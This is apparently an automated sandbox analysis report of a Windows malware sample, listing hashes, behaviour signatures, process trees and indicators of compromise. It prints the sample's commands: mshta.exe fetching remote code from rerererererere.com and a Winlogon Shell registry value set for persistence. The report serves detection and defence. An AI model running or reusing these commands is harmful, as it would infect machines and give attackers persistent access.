Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
151s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
08/01/2024, 23:56
Behavioral task
behavioral1
Sample
4ccacea000c555b1a333175803ba0af5.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4ccacea000c555b1a333175803ba0af5.exe
Resource
win10v2004-20231215-en
General
-
Target
4ccacea000c555b1a333175803ba0af5.exe
-
Size
691KB
-
MD5
4ccacea000c555b1a333175803ba0af5
-
SHA1
8e919e3a04036ee3b5122d3fb047d907d23d1e3d
-
SHA256
f81cea3cf23dc2d75ad5c9deb707b07807c90a55520e441a7630aa7573f95bb0
-
SHA512
0bca51112c16fe66ac910289bf665168f25d71c4101123987c0afafdc698b93549eaf82e64be315ff9296cb3710a7d6375543952ab8e13f8d0aaf8de795d13ea
-
SSDEEP
12288:MSJsWPOGw+qYwxPsw5gubWPRJ+wsHdLgRU3M7tToSGRpQ7E5x36NuP:MSnwKwauipJXlCc7tkSGRWix36
Malware Config
Extracted
http://rerererererere.com/inst.php?id=forbidden
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\palladium.exe" z.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation 4ccacea000c555b1a333175803ba0af5.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation z.exe -
Executes dropped EXE 1 IoCs
pid Process 2636 z.exe -
resource yara_rule behavioral2/memory/4908-0-0x0000000000400000-0x0000000000507000-memory.dmp upx behavioral2/files/0x000600000002312c-12.dat upx behavioral2/memory/2636-16-0x0000000000400000-0x00000000007FC000-memory.dmp upx behavioral2/memory/4908-17-0x0000000000400000-0x0000000000507000-memory.dmp upx behavioral2/memory/2636-26-0x0000000000400000-0x00000000007FC000-memory.dmp upx behavioral2/memory/2636-27-0x0000000000400000-0x00000000007FC000-memory.dmp upx behavioral2/memory/2636-28-0x0000000000400000-0x00000000007FC000-memory.dmp upx behavioral2/memory/2636-30-0x0000000000400000-0x00000000007FC000-memory.dmp upx behavioral2/memory/2636-31-0x0000000000400000-0x00000000007FC000-memory.dmp upx behavioral2/memory/2636-32-0x0000000000400000-0x00000000007FC000-memory.dmp upx behavioral2/memory/2636-33-0x0000000000400000-0x00000000007FC000-memory.dmp upx behavioral2/memory/2636-34-0x0000000000400000-0x00000000007FC000-memory.dmp upx behavioral2/memory/2636-35-0x0000000000400000-0x00000000007FC000-memory.dmp upx behavioral2/memory/2636-36-0x0000000000400000-0x00000000007FC000-memory.dmp upx behavioral2/memory/2636-37-0x0000000000400000-0x00000000007FC000-memory.dmp upx behavioral2/memory/2636-38-0x0000000000400000-0x00000000007FC000-memory.dmp upx behavioral2/memory/2636-39-0x0000000000400000-0x00000000007FC000-memory.dmp upx behavioral2/memory/2636-40-0x0000000000400000-0x00000000007FC000-memory.dmp upx behavioral2/memory/2636-41-0x0000000000400000-0x00000000007FC000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe 2636 z.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2636 z.exe 2636 z.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 4908 wrote to memory of 2636 4908 4ccacea000c555b1a333175803ba0af5.exe 90 PID 4908 wrote to memory of 2636 4908 4ccacea000c555b1a333175803ba0af5.exe 90 PID 4908 wrote to memory of 2636 4908 4ccacea000c555b1a333175803ba0af5.exe 90 PID 2636 wrote to memory of 2364 2636 z.exe 92 PID 2636 wrote to memory of 2364 2636 z.exe 92 PID 2636 wrote to memory of 2364 2636 z.exe 92 PID 2636 wrote to memory of 5028 2636 z.exe 93 PID 2636 wrote to memory of 5028 2636 z.exe 93 PID 2636 wrote to memory of 5028 2636 z.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\4ccacea000c555b1a333175803ba0af5.exe"C:\Users\Admin\AppData\Local\Temp\4ccacea000c555b1a333175803ba0af5.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Users\Admin\AppData\Roaming\z.exe"C:\Users\Admin\AppData\Roaming\z.exe" forbidden2⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2636 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" http://rerererererere.com/inst.php?id=forbidden3⤵PID:2364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\dgfdgsdf.bat" "3⤵PID:5028
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
167B
MD5e5a2cf708be039ebe72233673c1f2ac7
SHA1cca4b5f8c08e07779f4eddd7e3c960d7f68078f8
SHA2561f67a80290e77b7ec48c8b676bcc076ff5b271e2caf17352b1880d65a956e43c
SHA5120d47a1ccf419c4cb8fc1a25b35470ba3b51e49a6045fe1efcd533ebbe9d69a92a1a7b60f2666e1419613c0bd45ffd128623adb11c313c1b3749727f5a4a9f645
-
Filesize
472KB
MD546577e2d36b664cf1cb8ec38b2889503
SHA13a239cc9b69a1501e3a43a746f2575da0a35bea8
SHA256a91320a68ef0f4103d2f8f28910f85ab4fc47ab496170e3b09f7856e527e38f9
SHA5129c17c1171b6f3c413865adedfaf05837e506cb7805cbbd6ba6806c1cd1691ae11ab6b17bc1fb171dd800892eb5ec1600954f73aa1c4a531dba5e2798f01dda8c